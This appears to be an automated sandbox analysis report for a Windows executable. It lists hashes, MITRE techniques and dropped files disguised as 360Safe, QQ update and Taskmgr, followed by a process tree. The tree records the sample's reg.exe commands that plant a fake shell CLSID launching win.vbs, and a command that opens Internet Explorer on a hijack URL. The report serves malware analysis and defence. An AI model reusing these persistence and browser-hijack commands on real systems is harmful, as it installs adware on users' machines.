7dfb45daa56d996ea22ef9c1dd0e28f9c0a3ff0bac79dc0884dca107783c7317

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
13/03/2024, 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c6bce06ca20ec135b6d5eda27a112cd9.exe
Size

510KB
MD5

c6bce06ca20ec135b6d5eda27a112cd9
SHA1

1e5d32158b075ac11d4d4d8f3bd472f3db026068
SHA256

7dfb45daa56d996ea22ef9c1dd0e28f9c0a3ff0bac79dc0884dca107783c7317
SHA512

7cb5086743c4d9dc528a0566b0abe2e563470de39fa9d434389fceb7ea6e602e88f41ad83d168b9e1f9fd4dfd0d3a835ed6edd844e9bdeaeed2056140ce576a2
SSDEEP

12288:Uky+d3utrzh9xOXkWl9ufWG7txDtQ4UeoD+UzgusnDw+JLkJ/HN:Ug3utr5OUWzuN7tltzNoaUtE+j

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3180	attrib.exe
1904	attrib.exe
3316	attrib.exe
4600	attrib.exe
4676	attrib.exe
2876	attrib.exe
5044	attrib.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	adminlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	msn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	pRaf.exe

Executes dropped EXE 5 IoCs

pid	Process
4608	adminlog.exe
1712	msn.exe
1220	pRaf.exe
3536	pRaf.exe
3892	pRaf.exe

Drops file in Program Files directory 41 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\360Safe.exe	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	\??\c:\Program Files\Tencent\QQUpadate\start.vbs	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	C:\Program Files\software\360.cmd	cmd.exe
File opened for modification	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	attrib.exe
File created	C:\Program Files (x86)\CE981.exe	c6bce06ca20ec135b6d5eda27a112cd9.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File opened for modification	C:\Program Files\software\fav\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	attrib.exe
File opened for modification	C:\Program Files (x86)\CE981.exe	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	\??\c:\Program Files\Tencent\QQUpadate\main.js	c6bce06ca20ec135b6d5eda27a112cd9.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	cmd.exe
File opened for modification	C:\Program Files\software\ware.vbs	cmd.exe
File opened for modification	C:\Program Files\software\360.cmd	cmd.exe
File created	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File created	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File created	C:\Program Files\software\fav\fav.cmd	cmd.exe
File created	C:\Program Files\software\tool.cmd	cmd.exe
File created	C:\Program Files\software\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\361.cmd	attrib.exe
File opened for modification	C:\Program Files (x86)\Common Files\360Safe.exe	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	\??\c:\Program Files\Tencent\QQUpadate\myat.cmd	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	attrib.exe
File opened for modification	C:\Program Files\software\360.cmd	attrib.exe
File created	C:\Program Files\software\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	cmd.exe
File created	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File created	C:\Program Files\software\fav\tao.ico	cmd.exe
File created	C:\Program Files\software\ware.vbs	cmd.exe
File opened for modification	C:\Program Files\software\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\software\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\360SE.vbs	attrib.exe
File opened for modification	C:\Program Files\software\tool.cmd	attrib.exe
File created	\??\c:\Program Files\Tencent\QQUpadate\Taskmgr.exe	c6bce06ca20ec135b6d5eda27a112cd9.exe
File created	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2280	sc.exe
2420	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1159997557"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb81c2d97e83014aa839d28a6b89bdd4000000000200000000001066000000010000200000006aa56c17dd07696cca2e492d6b243d0654331b4a0d9a0cc58371a901cbd6d80b000000000e800000000200002000000003243749721467cc8ac9dfbabd5e62e95b73d0f43bef3480651e6c496fdaa0aa200000000c042e83baf39a461cb28d73d913edcd9908721c957efed09a3f55648723c2bf40000000142d0589c887f1c7326542f5e5670018009fa9498ced152d9a683fbb9d89c94d0397d30529ce5d4a9b36d41ff554db2fd14f5628efdf1394cf2aaae46587c346	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{707577D2-E174-11EE-9216-4A48D699C5C8} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80cdee458175da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31094145"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb81c2d97e83014aa839d28a6b89bdd400000000020000000000106600000001000020000000f0780eb019efd3b7d69ac30ff3411926df2cd450d62ef3d946b2b4ce5a6e2842000000000e80000000020000200000001af98d496f13ff1b0f06eab2817bf3c8eda7fe93f08eab5ecf384a94ae142cdf20000000c1d298c607d36b8f9c7189e54d44e1095d997036b7255b02c467473d482e3b6a40000000aafe88d04c77f68b5b4150dc2257d8bdabe6e771c895641b6dab4e88aaa7fbfa29836f3ae0b922bd890e73e8056643013e8e6410c9b271e334f4251b4e0662b7	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1154997491"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31094145"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1154997491"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31094145"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9030e5458175da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417125046"	iexplore.exe

Modifies registry class 41 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideFolderVerbs	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	adminlog.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder\WantsParsDisplayName	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\software\\Microsoft\\win.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
756	c6bce06ca20ec135b6d5eda27a112cd9.exe
756	c6bce06ca20ec135b6d5eda27a112cd9.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1876	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1876	iexplore.exe
1876	iexplore.exe
4644	IEXPLORE.EXE
4644	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 4608	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	87
PID 756 wrote to memory of 4608	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	87
PID 756 wrote to memory of 4608	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	87
PID 756 wrote to memory of 2240	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	89
PID 756 wrote to memory of 2240	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	89
PID 756 wrote to memory of 2240	756	c6bce06ca20ec135b6d5eda27a112cd9.exe	89
PID 2240 wrote to memory of 2668	2240	wscript.exe	90
PID 2240 wrote to memory of 2668	2240	wscript.exe	90
PID 2240 wrote to memory of 2668	2240	wscript.exe	90
PID 4608 wrote to memory of 1976	4608	adminlog.exe	91
PID 4608 wrote to memory of 1976	4608	adminlog.exe	91
PID 4608 wrote to memory of 1976	4608	adminlog.exe	91
PID 1976 wrote to memory of 2544	1976	WScript.exe	92
PID 1976 wrote to memory of 2544	1976	WScript.exe	92
PID 1976 wrote to memory of 2544	1976	WScript.exe	92
PID 2544 wrote to memory of 1876	2544	cmd.exe	95
PID 2544 wrote to memory of 1876	2544	cmd.exe	95
PID 1976 wrote to memory of 1204	1976	WScript.exe	98
PID 1976 wrote to memory of 1204	1976	WScript.exe	98
PID 1976 wrote to memory of 1204	1976	WScript.exe	98
PID 1204 wrote to memory of 1360	1204	cmd.exe	100
PID 1204 wrote to memory of 1360	1204	cmd.exe	100
PID 1204 wrote to memory of 1360	1204	cmd.exe	100
PID 1876 wrote to memory of 4644	1876	iexplore.exe	101
PID 1876 wrote to memory of 4644	1876	iexplore.exe	101
PID 1876 wrote to memory of 4644	1876	iexplore.exe	101
PID 1204 wrote to memory of 3096	1204	cmd.exe	102
PID 1204 wrote to memory of 3096	1204	cmd.exe	102
PID 1204 wrote to memory of 3096	1204	cmd.exe	102
PID 1204 wrote to memory of 3704	1204	cmd.exe	103
PID 1204 wrote to memory of 3704	1204	cmd.exe	103
PID 1204 wrote to memory of 3704	1204	cmd.exe	103
PID 1204 wrote to memory of 2332	1204	cmd.exe	104
PID 1204 wrote to memory of 2332	1204	cmd.exe	104
PID 1204 wrote to memory of 2332	1204	cmd.exe	104
PID 1204 wrote to memory of 3064	1204	cmd.exe	105
PID 1204 wrote to memory of 3064	1204	cmd.exe	105
PID 1204 wrote to memory of 3064	1204	cmd.exe	105
PID 1204 wrote to memory of 3288	1204	cmd.exe	106
PID 1204 wrote to memory of 3288	1204	cmd.exe	106
PID 1204 wrote to memory of 3288	1204	cmd.exe	106
PID 1204 wrote to memory of 3548	1204	cmd.exe	107
PID 1204 wrote to memory of 3548	1204	cmd.exe	107
PID 1204 wrote to memory of 3548	1204	cmd.exe	107
PID 1204 wrote to memory of 4600	1204	cmd.exe	145
PID 1204 wrote to memory of 4600	1204	cmd.exe	145
PID 1204 wrote to memory of 4600	1204	cmd.exe	145
PID 1204 wrote to memory of 3320	1204	cmd.exe	109
PID 1204 wrote to memory of 3320	1204	cmd.exe	109
PID 1204 wrote to memory of 3320	1204	cmd.exe	109
PID 1204 wrote to memory of 3216	1204	cmd.exe	110
PID 1204 wrote to memory of 3216	1204	cmd.exe	110
PID 1204 wrote to memory of 3216	1204	cmd.exe	110
PID 1204 wrote to memory of 4336	1204	cmd.exe	111
PID 1204 wrote to memory of 4336	1204	cmd.exe	111
PID 1204 wrote to memory of 4336	1204	cmd.exe	111
PID 1204 wrote to memory of 1848	1204	cmd.exe	112
PID 1204 wrote to memory of 1848	1204	cmd.exe	112
PID 1204 wrote to memory of 1848	1204	cmd.exe	112
PID 1204 wrote to memory of 4820	1204	cmd.exe	113
PID 1204 wrote to memory of 4820	1204	cmd.exe	113
PID 1204 wrote to memory of 4820	1204	cmd.exe	113
PID 1204 wrote to memory of 2768	1204	cmd.exe	114
PID 1204 wrote to memory of 2768	1204	cmd.exe	114

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4600	attrib.exe
4676	attrib.exe
2876	attrib.exe
5044	attrib.exe
3180	attrib.exe
1904	attrib.exe
3316	attrib.exe

C:\Users\Admin\AppData\Local\Temp\c6bce06ca20ec135b6d5eda27a112cd9.exe
"C:\Users\Admin\AppData\Local\Temp\c6bce06ca20ec135b6d5eda27a112cd9.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:756
- C:\Users\Admin\AppData\Local\Temp\adminlog.exe
  "C:\Users\Admin\AppData\Local\Temp\adminlog.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_7xdown.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?7xdown
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2544
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?7xdown
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1876
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:17410 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:4644
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\tool.cmd
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1204
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        Modifies registry class
        
        PID:3096
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
        5⤵
        Modifies registry class
        
        PID:3704
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
        5⤵
        Modifies registry class
        
        PID:2332
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon"
        5⤵
        Modifies registry class
        
        PID:3064
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
        5⤵
        Modifies registry class
        
        PID:3288
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32"
        5⤵
        Modifies registry class
        
        PID:3548
    - - C:\Windows\SysWOW64\reg.exe
        
